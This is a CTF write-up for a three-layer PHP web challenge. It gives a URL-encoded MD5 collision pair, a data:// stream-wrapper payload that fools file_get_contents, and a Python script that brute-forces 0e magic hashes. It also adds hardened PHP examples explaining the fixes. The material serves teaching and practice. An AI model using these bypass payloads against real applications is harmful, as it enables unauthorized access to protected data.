Challenge:
<?php
highlight_file(__FILE__);
if(md5($_GET['pass']) == md5($_GET['username']) && $_GET['pass'] != $_GET['username']){
    if(strpos($_GET['username'],"tsctf") === 0){
        if(file_get_contents($_POST['file']) === "TSCTF-J{fake_flag}"){
            echo file_get_contents("/flag");
        }else{
            echo "Sorry1";
        }
    }else{
        echo "Sorry2";
    }
}else{
    echo "Sorry3";
}
Sorry3
This challenge has three layers. The first layer can be bypassed with arrays, or with values whose MD5 hash begins with 0e; but once past it, the second layer requires the value of the GET parameter username to begin with tsctf, so we have to find an MD5 collision. For details see https://xz.aliyun.com/t/2232
Once we have the values of the two parameters, we can pass the first and second layers:
pass=tsctf%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%06%D3%C1%90x%81d%7E%7C%A5%D1%0A%F5%97Y%C8%A3%FB%B8JFpG%00C%0EB%AD%D5A%C7%BDl%A3%F2%E1%E0%E9+%D7%8B%FA%CD1%0D%E6%F3i%7C%CB_%E7%D22%7C%E3pK%E3%D9%C4%0A%92%D4%23P%B3%8E1%7BG%D5%D7A%E6%F5f%0D%7E%1D%85%DEl%92N%0F%9B%DB%7C%8D%CFW%5BP%EDA%24%F8%C8j%02%D0%A2%FF%5B%9E%EBPQ%BE%7D%2B%1FOM%1D3u%7Eu%B5%E8%80%B2%E7%AE%D2%A2
username=tsctf%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%06%D3%C1%90x%81d%7E%7C%A5%D1%0A%F5%97Y%C8%A3%FB%B8%CAFpG%00C%0EB%AD%D5A%C7%BDl%A3%F2%E1%E0%E9+%D7%8B%FA%CD1%0Df%F4i%7C%CB_%E7%D22%7C%E3pK%E3Y%C4%0A%92%D4%23P%B3%8E1%7BG%D5%D7A%E6%F5f%0D%7E%1D%85%DEl%12N%0F%9B%DB%7C%8D%CFW%5BP%EDA%24%F8%C8j%02%D0%A2%FF%5B%9E%EBPQ%3E%7D%2B%1FOM%1D3u%7Eu%B5%E8%802%E7%AE%D2%A2
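Why the first layer's `==` is bypassable, shown beside a hardened check. This is an added example and not part of the original writeup; the two magic strings QNKCDZO and 240610708 are well-known public inputs whose MD5 digests start with 0e, and the function names are mine.

```php
<?php
// Added example: the challenge's loose md5 comparison next to a strict one.

// Both digests are "0e" followed only by digits, so PHP's == treats them as the
// numeric string 0 and reports them equal, although the bytes differ.
$a = "QNKCDZO";    // md5 = 0e830400451993494058024219903391
$b = "240610708";  // md5 = 0e462097431906509019562988736854

function looseCheck($pass, $username): bool {
    // Vulnerable form from the challenge: == on two hex digests triggers numeric comparison.
    return md5($pass) == md5($username) && $pass != $username;
}

function strictCheck($pass, $username): bool {
    // Hardened form: reject anything that is not a string first (an array makes md5()
    // return NULL with a warning on PHP 7 and throw a TypeError on PHP 8), then compare
    // the digests byte for byte with hash_equals(), which is strict and constant-time.
    if (!is_string($pass) || !is_string($username)) {
        return false;
    }
    return hash_equals(md5($pass), md5($username)) && $pass !== $username;
}

var_dump(looseCheck($a, $b));
var_dump(strictCheck($a, $b));
var_dump(strictCheck($a, $a));
```

looseCheck($a, $b) returns true for these two different inputs, while strictCheck returns false for both calls. Note what hash_equals does not fix: a genuine MD5 collision such as the pass/username pair above still produces identical digests, so strictCheck would accept it. Comparing MD5 of two attacker-controlled values is not a meaningful check at all; a hardened application would compare a single hash of the user's input against a stored value using a collision-resistant function such as SHA-256.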
Third layer:
if(file_get_contents($_POST['file']) === "TSCTF-J{fake_flag}")
Use the data:// pseudo-protocol (stream wrapper):
file=data://text/plain,TSCTF-J{fake_flag}
Result:
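The third layer passes because file_get_contents() accepts any registered stream wrapper, so a data: URI is "read" like a file. An added hardening example, not part of the original challenge, that confines the read to plain files under one directory; the base directory, function name and sample paths are assumptions:

```php
<?php
// Added example: confine file_get_contents() to regular files below $baseDir.
// $baseDir is an assumed location, not something from the challenge.
function readConfined(string $userPath, string $baseDir = '/var/app/data'): ?string {
    // Allow-list the characters of a relative path. This rejects every wrapper form
    // (data:, data://, php://filter, http://) because none can be written without ':',
    // and it rejects NUL bytes before the path reaches the filesystem.
    if ($userPath === '' || preg_match('/[^A-Za-z0-9_.\/-]/', $userPath)) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $userPath);
    // realpath() resolves ../ and symlinks; the result must stay strictly inside $base.
    if ($base === false || $real === false
        || strncmp($real, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    // Only regular files, never directories or devices.
    if (!is_file($real)) {
        return null;
    }
    return file_get_contents($real);
}

// Constructed inputs: the writeup's payload and a traversal attempt.
var_dump(readConfined('data://text/plain,TSCTF-J{fake_flag}'));
var_dump(readConfined('../../etc/passwd'));
```

Both calls return NULL: the first fails the character allow-list, the second resolves outside the base directory. The allow-list runs before realpath() on purpose, because realpath() itself rejects NUL bytes with an error on PHP 8 and is not a defence against wrappers.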
Supplement
Script:
import hashlib

ts = "tsctf"  # the prefix the second layer requires

def md5(key):
    m = hashlib.md5()
    m.update(key.encode('utf-8'))
    return m.hexdigest()

def check(plx):
    # PHP's == treats "0e" followed only by digits as the number 0, so any such
    # digest compares equal to any other; a letter after "0e" would break that.
    t = md5(plx)
    return t.startswith("0e") and t[2:].isdigit()

for i in range(1, 1000000000):
    s = ts + str(i)
    if check(s):
        print(s)
        break